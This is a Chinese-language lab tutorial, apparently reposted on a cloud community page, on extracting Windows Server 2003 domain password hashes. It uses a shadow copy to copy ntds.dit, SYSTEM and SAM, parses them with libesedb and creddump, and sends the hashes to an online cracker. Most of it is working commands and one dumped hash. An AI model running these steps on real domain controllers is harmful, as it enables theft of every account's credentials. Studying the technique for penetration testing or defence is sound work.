離線破win2003域帳號密碼

來源:互聯網
上載者:User

標籤:c   style   blog   a   http   tar   

離線破win2003域帳號密碼

 

 

國內網站講了許多方法。把我實驗成功的經驗跟大家分享。

方法是按照tim的文章操作,連結如下:

http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html

  

  

一實驗環境:windows server2003,域環境

搭建方法很簡單,百度搜搜。

準備工具:vssown.vbs,bt5,ntds_dump_hash.zip

vssown.vbs網上找

http://www.ntdsxtract.com/downloads/ntds_dump_hash.zip

http://ftp.halifax.rwth-aachen.de/backtrack/BT5R1-GNOME-VM-32.7z

 

 

建立一個域使用者xiaocai,密碼設為 123abcABC

  

   

二win2003下提取檔案

  

1、將vssown.vbs拷到網域服務器上,比如拷到網域服務器的案頭。

2、以管理員身份運行cmd,執行以下命名:

cd 案頭

cscript //nologo vssown.vbs /start 啟用

cscript //nologo vssown.vbs /status 查看運行狀態

cscript //nologo vssown.vbs /create C 建立快照

  

cscript //nologo vssown.vbs /list 查看建立的快照資訊

  

  

這裡可以看到系統內部的路徑,將兩個ntds.dit和SYSTEM檔案複製到案頭,這裡的[X]用5代替。

  

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM

  

  

  

提取就檔案就結束了。這裡嘗試的時候經常失敗。有空再找找資料到底是什麼造成。

  

再把快照刪除(這步可選,建議刪除掉)

cscript //nologo vssown.vbs /delete {B3475A72-86D2-48EC-A22F-6E8DBB82903D}

 

把這3個產生的檔案複製出來。

   

三提取HASH

  

先下載工具,BT5,我是用下面這個虛擬機器鏡相

VMWARE鏡像32位:http://ftp.halifax.rwth-aachen.de/backtrack/BT5R1-GNOME-VM-32.7z

預設登陸密碼:root/toor

  

開放ssh服務:(開啟服務後可以用Secure CRT進行訪問,方便傳檔案)

ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key

ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key

sshd-generate

/etc/init.d/ssh restart

  

略掉一個

   

用ifconfig查看IP

  

接著用Secure CRT訪問,

  

  

  

按ALT+P 開啟SFTP,把檔案傳到/tmp下

cd /tmp

put SYSTEM ntds.dit ntds_dump_hash.zip

  

切換到BT5系統標籤

cd /tmp

ls

#解壓 ntds_dump_hash.zip

unzip ntds_dump_hash.zip

  

#編譯libesedb

cd libesedb

chmod +x configure

./configure && make

  

#解釋資料檔案ntds.dit

cd esedbtools

./esedbdumphash ../../ntds.dit

  

#提取hash

cd ../../creddump/

python ./dsdump.py ../SYSTEM ../libesedb/esedbtools/ntds.dit.export/datatable

  

提取出來了,找到,

xiaocai:1109:8A79528CCD6E0DBFFCD6B8DB0F458C37:3B0DE00581A39A49946206E0998B7DF7:::

  

  

四破解hash

  

破解hash方法很多,這裡採用網站破解。把加粗的那部分放到網站上去破解:http://www.objectif-securite.ch/en/ophcrack.php

  

  

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.